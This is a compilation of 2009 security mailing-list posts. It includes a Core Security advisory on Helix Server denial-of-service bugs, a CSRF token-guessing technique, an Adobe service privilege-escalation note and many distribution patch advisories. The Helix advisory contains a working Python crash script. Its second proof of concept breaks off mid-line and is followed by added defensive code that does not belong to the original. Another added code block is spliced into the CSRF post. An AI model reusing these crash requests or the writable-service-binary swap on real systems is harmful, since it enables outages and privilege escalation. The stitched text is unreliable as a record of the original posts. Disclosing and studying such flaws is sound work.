CORE-2009-0227: Real Helix DNA RTSP and SETUP request handler vulnerabilities
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/

Real Helix DNA RTSP and SETUP request handler vulnerabilities

1. *Advisory Information*

Title: Real Helix DNA RTSP and SETUP request handler vulnerabilities
Advisory ID: CORE-2009-0227
Advisory URL: http://www.coresecurity.com/content/real-helix-dna
Date published: 2009-07-17
Date of last update: 2009-07-17
Vendors contacted: RealNetworks
Release mode: Forced release

2. *Vulnerability Information*

Class: Denial of service (DoS)
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: N/A
CVE Name: CVE-2009-2533, CVE-2009-2534

3. *Vulnerability Description*

Helix Server is a multi-format cross-platform streaming server. Two vulnerabilities have been found that could allow a remote attacker to crash the Helix Server.

While handling an 'RTSP' (SET_PARAMETERS) request, if the server receives an empty 'DataConvertBuffer' parameter, it raises an exception when reading an invalid memory address. This exception is usually handled correctly, but if the malformed request is sent multiple times in a short period of time, it can render the Helix Server unresponsive and terminate its execution.

While handling a 'SETUP' request, the server searches the request line for a 0x2F character; if this byte is absent, the process crashes with an access violation.

4. *Vulnerable packages*

. Helix Server Version 12.x
. Helix Mobile Server Version 12.x
. The vulnerabilities were investigated on Helix Server Version 12.0.1.215 (Tahiti) Build 175002/12667

5. *Non-vulnerable packages*

. Helix Server Version 13.0.0
. Helix Mobile Server Version 13.0.0

6. *Vendor Information, Solutions and Workarounds*

According to the Security Update 071409HS [2] published by RealNetworks:

The vulnerability is resolved on the following platforms by installing Version 13.0.0 of the Helix Server and the Helix Mobile Server. This only pertains to supported versions of the platforms listed below. The updated version will be available on your RealNetworks PAM site after 12:00 am PST, on July 14, 2009.

. Red Hat Enterprise Linux 4
. Red Hat Enterprise Linux 5
. Sun Solaris 10
. Windows 2003

7. *Credits*

These vulnerabilities were discovered and researched by Damian Frizza from Core Security Technologies.

8. *Technical Description / Proof of Concept Code*

8.1. *RTSP request handling Denial of Service (CVE-2009-2533)*

The problem arises when the 'rmserver' process receives an 'RTSP (SET_PARAMETER)' request with no content in the 'DataConvertBuffer' parameter. The handling code reads from memory location zero (0) and triggers an exception, which is handled correctly. However, sending this malformed request multiple times renders the rmserver process unresponsive and subsequently stops its execution. The code section which triggers the exception is:

/---
00458066 |. C745 08     MOV DWORD PTR SS:[EBP+8],0      ; Sets the content of the local variable to 0
0045806D |. 8B10        MOV EDX,DWORD PTR DS:[EAX]
0045806F |. 50          PUSH EAX
00458070 |. FF52 2C     CALL DWORD PTR DS:[EDX+2C]
00458073 |. 8B45 08     MOV EAX,DWORD PTR SS:[EBP+8]
00458076 |. 8B10        MOV EDX,DWORD PTR DS:[EAX]      ; Tries to read from memory location 0
---/

The following PoC code reproduces the issue:

/---
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('172.16.132.133',554))
setRequest = "SET_PARAMETER / RTSP/1.0\r\n"
setRequest += "DataConvertBuffer: \r\n\r\n"
for i in range(5):
    print i
    s.send(setRequest)
s.close()
---/

The following output is written in the log file:

/---
4068: FATAL ERROR: The server has run out of memory!
FATAL ERROR: Last request was rounded up to 1155072 bytes
Trace: 0x00409C96 ... ... ... 0x
FATAL ERROR: Server Terminated
---/

8.2. *Malformed SETUP command handling Denial of Service (CVE-2009-2534)*

The problem arises when the 'SETUP' request is handled and the byte 0x2F is absent in the request line. While handling this kind of malformed request the server crashes with an access violation. The code section which triggers the access violation is:

/---
0047A490 |. 6A 2F           PUSH 2F
0047A492 |. 56              PUSH ESI
0047A493 |. FF15 08425100   CALL DWORD PTR DS:[MSVCR71.strchr]   ; MSVCR71.strchr
---/

If only the / (0x2F) character is sent, the program tries to copy from 0 and the access violation exception is raised.

/---
0047A490 |. 6A 2F           PUSH 2F
0047A492 |. 56              PUSH ESI
0047A493 |. FF15 08425100   CALL DWORD PTR DS:[MSVCR71.strchr]   ; MSVCR71.strchr
---/

The following code reproduces the issue:

/---
import socket
s =
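A defender-side screen for the two request shapes the advisory describes, as an added example that is not part of the Core advisory or of Helix Server: it could sit in an RTSP-aware proxy or log pipeline in front of an unpatched 12.x server. The strict SETUP rule (absolute rtsp/rtspu URL with a path), the burst threshold, the function names and the sample traffic are all assumptions made for the illustration.

```python
"""Screen RTSP requests for the two malformed shapes in CORE-2009-0227."""
from collections import defaultdict, deque
from urllib.parse import urlsplit

BURST_LIMIT = 3      # assumption: malformed requests per source before blocking
BURST_WINDOW = 10.0  # assumption: sliding window, in seconds


def parse_request(raw):
    """Return (method, target, version, headers) or None if the line is malformed."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not all(parts):
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], parts[2], headers


def classify(raw):
    """Name the suspicious shape of one request, or return None if it looks sane."""
    parsed = parse_request(raw)
    if parsed is None:
        return "malformed-request-line"
    method, target, _version, headers = parsed
    # CVE-2009-2533 shape: the header is present but carries no value.
    if method == "SET_PARAMETER" and headers.get("dataconvertbuffer") == "":
        return "empty-DataConvertBuffer"
    # CVE-2009-2534 shape: the handler looks for '/' in the request line.
    # Strict policy (assumption): SETUP must name an absolute stream URL with a path.
    if method == "SETUP":
        url = urlsplit(target)
        if url.scheme not in ("rtsp", "rtspu") or not url.netloc or url.path in ("", "/"):
            return "setup-target-not-absolute-url"
    return None


class BurstTracker:
    """Counts malformed requests per source inside a sliding time window."""

    def __init__(self, limit=BURST_LIMIT, window=BURST_WINDOW):
        self.limit = limit
        self.window = window
        self.hits = defaultdict(deque)

    def record(self, src, ts):
        queue = self.hits[src]
        queue.append(ts)
        while queue and ts - queue[0] > self.window:
            queue.popleft()
        return len(queue) >= self.limit


def screen(events):
    """events: iterable of (timestamp, source, raw_request). Returns alert tuples."""
    tracker = BurstTracker()
    alerts = []
    for ts, src, raw in events:
        reason = classify(raw)
        if reason is None:
            continue
        # The advisory notes a single bad SET_PARAMETER is survivable; repeats are not.
        action = "block" if tracker.record(src, ts) else "log"
        alerts.append((ts, src, reason, action))
    return alerts


# Constructed sample traffic (documentation addresses, not captured data).
EMPTY_DCB = b"SET_PARAMETER / RTSP/1.0\r\nDataConvertBuffer: \r\n\r\n"
SAMPLE_EVENTS = [
    (0.0, "192.0.2.10", b"OPTIONS rtsp://media.example/clip.rm RTSP/1.0\r\nCSeq: 1\r\n\r\n"),
    (0.5, "192.0.2.66", EMPTY_DCB),
    (0.6, "192.0.2.66", EMPTY_DCB),
    (0.7, "192.0.2.66", EMPTY_DCB),
    (1.0, "192.0.2.10", b"SETUP rtsp://media.example/clip.rm/streamid=0 RTSP/1.0\r\n"
                        b"CSeq: 2\r\nTransport: RTP/AVP;unicast\r\n\r\n"),
    (2.0, "192.0.2.77", b"SETUP clip RTSP/1.0\r\nCSeq: 1\r\n\r\n"),
]

if __name__ == "__main__":
    for alert in screen(SAMPLE_EVENTS):
        print(alert)
```

Upgrading to Version 13.0.0 remains the fix named by the vendor; a screen like this only reduces exposure while 12.x is still deployed.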
[ GLSA 200907-15 ] Nagios: Execution of arbitrary code
Gentoo Linux Security Advisory                           GLSA 200907-15
http://security.gentoo.org/

Severity: High
Title: Nagios: Execution of arbitrary code
Date: July 19, 2009
Bugs: #245887, #249876, #275288
ID: 200907-15

Synopsis
========

Multiple vulnerabilities in Nagios may lead to the execution of arbitrary code.

Background
==========

Nagios is an open source host, service and network monitoring program.

Affected packages
=================

     Package                    /  Vulnerable  /  Unaffected
  1  net-analyzer/nagios-core      < 3.0.6-r2     >= 3.0.6-r2

Description
===========

Multiple vulnerabilities have been reported in Nagios:

* Paul reported that statuswml.cgi does not properly sanitize shell metacharacters in the (1) ping and (2) traceroute parameters (CVE-2009-2288).

* Nagios does not properly verify whether an authenticated user is authorized to run certain commands (CVE-2008-5027).

* Andreas Ericsson reported that Nagios does not perform validity checks to verify HTTP requests, leading to Cross-Site Request Forgery (CVE-2008-5028).

* An unspecified vulnerability in Nagios related to CGI programs, adaptive external commands, and writing newlines and submitting service comments has been reported (CVE-2008-6373).

Impact
======

A remote authenticated or unauthenticated attacker may exploit these vulnerabilities to execute arbitrary commands or elevate privileges.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Nagios users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot -v =net-analyzer/nagios-core-3.0.6-r2

NOTE: Users of the Nagios 2 branch can update to version 2.12-r1 which contains a patch to fix CVE-2009-2288. However, that branch is not supported upstream or in Gentoo and we are unaware whether the other vulnerabilities affect 2.x installations.

References
==========

  [ 1 ] CVE-2008-5027
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5027
  [ 2 ] CVE-2008-5028
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5028
  [ 3 ] CVE-2008-6373
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6373
  [ 4 ] CVE-2009-2288
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2288

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200907-15.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
Hacking CSRF Tokens using CSS History Hack
I was thinking about the problem of Cross Site Request Forgery and the current mitigation strategies used in the industry. In many of the real-world applications I have tested so far, I see random tokens appended as part of the URL. If a request fails to provide a token, or provides a token with an incorrect value, the request is rejected. This prevents CSRF or any cross-domain unauthorized function execution.

Until now, it was considered infeasible for an attacker to discover your CSRF token using brute force attacks on the server. The reasons being:

1. It generates a lot of noise on the network and is slow, so most probably an IDS or Web App Firewall will pick up the malicious behavior and block your IP. For example, a Base16 CSRF token of length 5 characters (starting with a character) will generate approximately 393,216 requests.

2. Many applications are programmed to invalidate your session after they detect more than a certain number of requests with invalid token values, e.g. 30.

I am going to change this belief by showing you a technique to quickly find CSRF tokens without generating alerts. This technique is a client-side attack, so there is almost no network traffic generated and hence your server and IDS/Web App Firewalls won't notice it at all. This attack is based on the popular CSS History Hack found by Jeremiah Grossman 3 years ago.

In this exploit, we discover the CSRF token by brute forcing sets of URLs against the browser history. We embed different CSRF token values as part of the URL and check whether the user has visited that URL. If yes, there is a good chance that the user is either using the same CSRF token in the current active session or might have used that token in a previous session. Once we have a list of all such tokens, we can just try our CSRF attack on the server using that small list.

Currently this attack is feasible for tokens with a length of 5 characters or shorter. I tried it on a base16 string of length 5 and was able to brute force the entire key space in less than 2 minutes.

For this attack to work, one of the following prerequisites must hold:

1. The CSRF token remains the same for a particular user session, e.g. csrf token=hash(session_id), OR

2. A CSRF token submitted in older forms for the same session is still accepted. Many times this is the case, as it enhances user experience and allows using the forward and back browser buttons.

Proof of Concept is available here. Before running the PoC, you need to change the url and csrftoken parameter values. For testing using the defaults, you need to first visit one of the following URLs, e.g.

1. http://securethoughts.com/?param1=val1csrftoken=b59fe [change b59fe to any 5-digit base 16 string starting with a character]

2. http://tinyurl.com/l2lwgd [which is a 301 redirect to the previous URL].

Note: http://www.securethoughts.com and http://securethoughts.com are treated differently while storing in browser history.

A sample run will look like this: http://securethoughts.com/wp-content/gallery/security/csrfcsshistory.jpg (CSRF Token using CSS History Hack)

To make this attack infeasible:

1. Server-Side Solution (for developers):

* Make your CSRF tokens long enough (8 or more chars) to be infeasible for a CLIENT SIDE attack. The ever-increasing processing power will make this attack feasible for longer tokens as well.
* Store your CSRF token as part of a hidden form field, rather than putting it in the URL.
* Use a different random token for every form submission and do not accept any obsolete token, even for the same session.

2. Client-Side Solution (for your customers/users):

* Use a browser plugin such as SafeHistory, which defends against visited-link-based tracking techniques.
* Use the private browsing mode in your browser.

And last, but not least, XSS obliterates all the CSRF protections possible. So, get rid of XSS first.

I would like to thank Jeremiah for providing his insightful feedback on this post.
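The three server-side recommendations above, combined in one sketch. This is an added example, not code from the original post: the class name, the `csrftoken` field name taken from the post's sample URL, and the request-as-dicts interface are assumptions. `guess_space` reproduces the post's 393,216 figure for a 5-character base16 token whose first character is a letter.

```python
"""Per-form, single-use CSRF tokens that never travel in the URL."""
import hmac
import html
import secrets

FIELD = "csrftoken"  # field name borrowed from the post's sample URL


def guess_space(length=5, alphabet=16, first_choices=6):
    """Candidate count for a token whose first character is one of a-f."""
    return first_choices * alphabet ** (length - 1)


class CsrfTokens:
    def __init__(self, nbytes=32):
        self.nbytes = nbytes
        self._current = {}  # (session_id, form_id) -> the one valid token

    def issue(self, session_id, form_id):
        """Mint a fresh token; any token issued earlier for this form becomes obsolete."""
        token = secrets.token_urlsafe(self.nbytes)  # 32 random bytes -> 43 characters
        self._current[(session_id, form_id)] = token
        return token

    def hidden_field(self, session_id, form_id):
        """Render the token as a hidden form field, so it never enters browser history."""
        token = self.issue(session_id, form_id)
        return '<input type="hidden" name="%s" value="%s">' % (
            FIELD, html.escape(token, quote=True))

    def redeem(self, session_id, form_id, query_params, form_params):
        """Accept a token once, from the POST body only.

        Every attempt consumes the stored token, so a replayed or guessed
        value never gets a second try against the same token.
        """
        expected = self._current.pop((session_id, form_id), None)
        if FIELD in query_params:
            # A token in the URL would be recorded in history and Referer headers.
            return False
        presented = form_params.get(FIELD, "")
        if expected is None:
            return False
        return hmac.compare_digest(expected.encode(), presented.encode())


if __name__ == "__main__":
    store = CsrfTokens()
    print("5-char base16 guess space:", guess_space())
    print(store.hidden_field("session-A", "transfer"))
    tok = store.issue("session-A", "transfer")
    print("first use :", store.redeem("session-A", "transfer", {}, {FIELD: tok}))
    print("replay    :", store.redeem("session-A", "transfer", {}, {FIELD: tok}))
```

Because a failed attempt also burns the stored token, a legitimate user whose form was targeted has to reload it; that trade-off is the same one the post describes for applications that invalidate sessions after repeated bad tokens.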
Adobe related service (getPlus_HelperSvc.exe) local elevation of privileges
Adobe related service (getPlus_HelperSvc.exe) local elevation of privileges
by Nine:Situations:Group

description: Adobe downloader used to download updates for Adobe applications. Shipped with Acrobat Reader 9.x
vendor: Nos Microsystems

poc:

C:\>sc qc "getPlus(R) Helper"
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: getPlus(R) Helper
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Programmi\NOS\bin\getPlus_HelperSvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : getPlus(R) Helper
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem

C:\>cacls "C:\Programmi\NOS\bin\getPlus_HelperSvc.exe"
C:\Programmi\NOS\bin\getPlus_HelperSvc.exe BUILTIN\Users:F  -- [!!!]
                                           NT AUTHORITY\SYSTEM:F

The executable file is installed with improper permissions, with full control for Builtin Users; a simple user can replace it with a binary of choice. At the next reboot it will run with SYSTEM privileges.

original url: http://retrogod.altervista.org/9sg_adobe_local.html
Re: [GSEC-TZO-44-2009] One bug to rule them all - Firefox, IE, Safari,Opera, Chrome,Seamonkey,iPhone,iPod,Wii,PS3....
Hello Thierry!

About your bug to rule them all I can tell, that it's interesting vulnerability and interesting research itself. I have found DoS vulnerabilities in multiple browsers many times, but I never tested in so many browsers and systems. So you made a large research (with help of those people who helped you with testing in different systems) - this DoS hole exists (or existed) in so many systems: different desktop browsers, email clients, browsers for mobile devices, game devices and possibly other devices with support of JavaScript. Maybe some of DoS holes found by me can also work on multiple platforms, but I didn't test in such large scale of devices (just in different browsers at my PC).

Credit : Except Apple - nobody

It's very common situation (with not serious relation of developers to security professionals who found holes in their programs). Especially in case of DoS vulnerabilities.

IV. Disclosure timeline ~ Nothing particular to note, except the usual discussion about availability being a security issue.

It is also very common for developers (browsers developers in particular) to not put DoS in category of security issues (even if they officially said that they acknowledge DoS as security issue). So nothing surprising :-) - I heard many times such statements from browsers developers.

Thierry, I even planned to write here a large message on this subject (which I planned in the beginning of this year), but I canceled it due to lack of time :-). In short: the developers are not right and DoS is a security issue.

I tested your vulnerability (your PoC) in all my browsers: Mozilla, Firefox, IE, Opera and Chrome. Here are results of my tests, which will be additional stroke to your picture of vulnerable browsers and systems.

Mozilla 1.7.x is not vulnerable. And this is a reason why I like Mozilla 1.7.x, because it hasn't many of the holes which Mozilla added to new versions of their Firefox ;-). You wrote that Firefox allocates 2 GB of memory and then crashes. My Mozilla only allocates about 900 MB of memory and then stops this process (and stops using of CPU). So it was just small lag, without particular strain, so it's not vulnerable.

Firefox 3.0.11 is not vulnerable (because was fixed in Firefox 3.0.5).

IE6 is vulnerable. But my IE6 is vulnerable in different way than other browsers. You wrote that IE5,6,7,8 allocates 2 GB of memory and then crashes. In my case, browser only takes CPU resources (over 50% at my two core processor, it'll be 100% on single core processor) without taking of memory.

Opera 9.52 is vulnerable (because was fixed in version after Opera 9.64). You wrote that Opera allocated and commits as much memory as available and will not crash. In my case Opera takes more than 2 GB (almost all memory available) and then freezes.

Google Chrome 1.0.154.48 is not vulnerable. You wrote that Chrome allocates 2 GB of memory and then crashes tab with a null pointer. In my case Chrome takes more than 2 GB of memory and then says its message about error at the page and frees all the memory. So in result almost no memory or CPU resources are used by the browser. You wrote that Chrome was patched (unknown version). As we see at least version Chrome 1.0.154.48 is not vulnerable.

There is also one interesting thing. You mentioned bug #460713 in Mozilla's bugzilla. When yesterday I came via this link I found that this entry is closed for viewing (even for logged in users). So for some unknown reasons Mozilla closed access to bug #460713 (https://bugzilla.mozilla.org/show_bug.cgi?id=460713), even if it's resolved. As you wrote, this hole was fixed in Firefox 3.0.5. This version was released at 16th of December 2008, so from that time and till now Mozilla didn't open this bug. Why they did it? Do they have something to hide from people :-).
Best wishes regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[ MDVSA-2009:156 ] net-snmp
_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2009:156
http://www.mandriva.com/security/
_______________________________________________________________________

Package : net-snmp
Date    : July 19, 2009
Affected: Corporate 3.0, Multi Network Firewall 2.0
_______________________________________________________________________

Problem Description:

A vulnerability has been found and corrected in net-snmp:

agent/snmp_agent.c in snmpd in net-snmp 5.0.9 in Red Hat Enterprise Linux (RHEL) 3 allows remote attackers to cause a denial of service (daemon crash) via a crafted SNMP GETBULK request that triggers a divide-by-zero error. NOTE: this vulnerability exists because of an incorrect fix for CVE-2008-4309 (CVE-2009-1887).

This update provides fixes for this vulnerability.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1887
_______________________________________________________________________

Updated Packages:
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
Re: PHP-Revista Multiple vulnerabilities
On Mon, 13 Apr 2009, mariani...@hotmail.com wrote: : Discovered by Sirdarckcat from elhacker.net By 'discovered', you mean 'copied from the disclosure in September 2006' right? CVE-2006-4605 through CVE-2006-4608.
[SECURITY] [DSA 1838-1] New pulseaudio packages fix privilege escalation
Debian Security Advisory DSA-1838-1                  secur...@debian.org
http://www.debian.org/security/                           Florian Weimer
July 18, 2009                         http://www.debian.org/security/faq

Package        : pulseaudio
Vulnerability  : privilege escalation
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2009-1894
Debian Bug     : 537351

Tavis Ormandy and Julien Tinnes discovered that the pulseaudio daemon does not drop privileges before re-executing itself, enabling local attackers to increase their privileges.

The old stable distribution (etch) is not affected by this issue.

For the stable distribution (lenny), this problem has been fixed in version 0.9.10-3+lenny1.

For the unstable distribution (sid), this problem will be fixed soon.

We recommend that you upgrade your pulseaudio packages.

Upgrade instructions

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 5.0 alias lenny
[ MDVSA-2009:155 ] git
_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2009:155
http://www.mandriva.com/security/
_______________________________________________________________________

Package : git
Date    : July 19, 2009
Affected: 2009.1
_______________________________________________________________________

Problem Description:

A vulnerability has been found and corrected in git:

git-daemon in git 1.4.4.5 through 1.6.3 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a request containing extra unrecognized arguments (CVE-2009-2108).

This update provides fixes for this vulnerability.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2108
_______________________________________________________________________

Updated Packages:
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
[ MDVSA-2009:153 ] dhcp
_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2009:153
http://www.mandriva.com/security/
_______________________________________________________________________

Package : dhcp
Date    : July 17, 2009
Affected: 2008.1, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0
_______________________________________________________________________

Problem Description:

A vulnerability has been found and corrected in ISC DHCP:

Integer overflow in the ISC dhcpd 3.0.x before 3.0.7 and 3.1.x before 3.1.1; and the DHCP server in EMC VMware Workstation before 5.5.5 Build 56455 and 6.x before 6.0.1 Build 55017, Player before 1.0.5 Build 56455 and Player 2 before 2.0.1 Build 55017, ACE before 1.0.3 Build 54075 and ACE 2 before 2.0.1 Build 55017, and Server before 1.0.4 Build 56528; allows remote attackers to cause a denial of service (daemon crash) or execute arbitrary code via a malformed DHCP packet with a large dhcp-max-message-size that triggers a stack-based buffer overflow, related to servers configured to send many DHCP options to clients (CVE-2007-0062).

This update provides fixes for this vulnerability.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0062
_______________________________________________________________________

Updated Packages:
DoS vulnerabilities in Firefox, Internet Explorer, Opera and Chrome
Hello Bugtraq!

I want to warn you about Denial of Service vulnerabilities in Firefox, Internet Explorer, Opera and Chrome.

Recently a buffer overflow vulnerability in Mozilla Firefox 3.5 was found by Andrew Haynes and Simon Berry-Byrne (http://websecurity.com.ua/3337/). After I checked this vulnerability in different browsers on 16.07.2009, I found that this Denial of Service vulnerability also exists in Firefox 3.0.11, Internet Explorer 6 and Opera 9.52 (and later also in Chrome 2.0.172).

DoS:

http://websecurity.com.ua/uploads/2009/Firefox,%20IE%20%20Opera%20DoS%20Exploit2.html

With this exploit Firefox crashes, IE6 consumes resources of CPU and RAM, Opera freezes at that consumes resources of CPU and RAM, and Chrome crashes.

Vulnerable version is Mozilla Firefox 3.0.11 and previous versions (and also Firefox 3.5).

Vulnerable version is Internet Explorer 6 (6.0.2900.2180) and previous versions. And potentially next versions (IE7 and IE8).

Vulnerable version is Opera 9.52 and previous versions (and potentially next versions too).

Vulnerable version is Google Chrome 2.0.172 and previous versions. At that Google Chrome 1.0.154.48 is not vulnerable - it's possible that vulnerable is only Chrome 2.x.

I mentioned this vulnerability at my site (http://websecurity.com.ua/3338/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[SECURITY] [DSA 1839-1] New gst-plugins-good0.10 packages fix arbitrary code execution
Debian Security Advisory DSA-1839-1                  secur...@debian.org
http://www.debian.org/security/                           Steffen Joeris
July 19, 2009                         http://www.debian.org/security/faq

Package        : gst-plugins-good0.10
Vulnerability  : integer overflow
Problem type   : local (remote)
Debian-specific: no
CVE Id(s)      : CVE-2009-1932
Debian Bugs    : 531631 532352

It has been discovered that gst-plugins-good0.10, the GStreamer plugins from the "good" set, are prone to an integer overflow when processing a large PNG file. This could lead to the execution of arbitrary code.

For the stable distribution (lenny), this problem has been fixed in version 0.10.8-4.1~lenny2.

For the oldstable distribution (etch), this problem has been fixed in version 0.10.4-4+etch1. Packages for the s390 and hppa architectures will be released once they are available.

For the testing distribution (squeeze) and the unstable distribution (sid), this problem has been fixed in version 0.10.15-2.

We recommend that you upgrade your gst-plugins-good0.10 packages.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
-------------------------------

Debian (oldstable)
------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
[USN-805-1] Ruby vulnerabilities
===========================================================
Ubuntu Security Notice USN-805-1              July 20, 2009
ruby1.8, ruby1.9 vulnerabilities
CVE-2009-0642, CVE-2009-1904
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  libruby1.8                      1.8.4-1ubuntu1.7
  ruby1.8                         1.8.4-1ubuntu1.7

Ubuntu 8.04 LTS:
  libruby1.8                      1.8.6.111-2ubuntu1.3
  ruby1.8                         1.8.6.111-2ubuntu1.3

Ubuntu 8.10:
  libruby1.8                      1.8.7.72-1ubuntu0.2
  libruby1.9                      1.9.0.2-7ubuntu1.2
  ruby1.8                         1.8.7.72-1ubuntu0.2
  ruby1.9                         1.9.0.2-7ubuntu1.2

Ubuntu 9.04:
  libruby1.8                      1.8.7.72-3ubuntu0.1
  libruby1.9                      1.9.0.2-9ubuntu1.1
  ruby1.8                         1.8.7.72-3ubuntu0.1
  ruby1.9                         1.9.0.2-9ubuntu1.1

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

It was discovered that Ruby did not properly validate certificates. An attacker could exploit this and present invalid or revoked X.509 certificates. (CVE-2009-0642)

It was discovered that Ruby did not properly handle string arguments that represent large numbers. An attacker could exploit this and cause a denial of service.
(CVE-2009-1904)
[ MDVSA-2009:154 ] dhcp
Mandriva Linux Security Advisory                         MDVSA-2009:154
http://www.mandriva.com/security/

Package : dhcp
Date    : July 19, 2009
Affected: 2008.1, 2009.0, 2009.1, Corporate 3.0, Corporate 4.0,
          Multi Network Firewall 2.0

Problem Description:

A vulnerability has been found and corrected in ISC DHCP:

ISC DHCP Server is vulnerable to a denial of service, caused by the improper handling of DHCP requests. If the host definitions are mixed using dhcp-client-identifier and hardware ethernet, a remote attacker could send specially-crafted DHCP requests to cause the server to stop responding (CVE-2009-1892).

This update provides fixes for this vulnerability.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1892
http://xforce.iss.net/xforce/xfdb/51717
[ MDVSA-2009:157 ] perl-Compress-Raw-Zlib
Mandriva Linux Security Advisory                         MDVSA-2009:157
http://www.mandriva.com/security/

Package : perl-Compress-Raw-Zlib
Date    : July 19, 2009
Affected: 2008.1, 2009.0, 2009.1

Problem Description:

A vulnerability has been found and corrected in perl-Compress-Raw-Zlib:

Off-by-one error in the inflate function in Zlib.xs in Compress::Raw::Zlib Perl module before 2.017, as used in AMaViS, SpamAssassin, and possibly other products, allows context-dependent attackers to cause a denial of service (hang or crash) via a crafted zlib compressed stream that triggers a heap-based buffer overflow, as exploited in the wild by Trojan.Downloader-71014 in June 2009 (CVE-2009-1391).

This update provides fixes for this vulnerability.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1391
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
[SECURITY] [DSA 1837-1] New dbus packages fix denial of service
Debian Security Advisory DSA-1837-1                  secur...@debian.org
http://www.debian.org/security/                           Steffen Joeris
July 18, 2009                         http://www.debian.org/security/faq

Package        : dbus
Vulnerability  : programming error
Problem type   : local
Debian-specific: no
CVE Id         : CVE-2009-1189
Debian Bug     : 532720

It was discovered that the dbus_signature_validate function in dbus, a simple interprocess messaging system, is prone to a denial of service attack. This issue was caused by an incorrect fix for DSA-1658-1.

For the stable distribution (lenny), this problem has been fixed in version 1.2.1-5+lenny1.

For the oldstable distribution (etch), this problem has been fixed in version 1.0.2-1+etch3.

Packages for ia64 and s390 will be released once they are available.

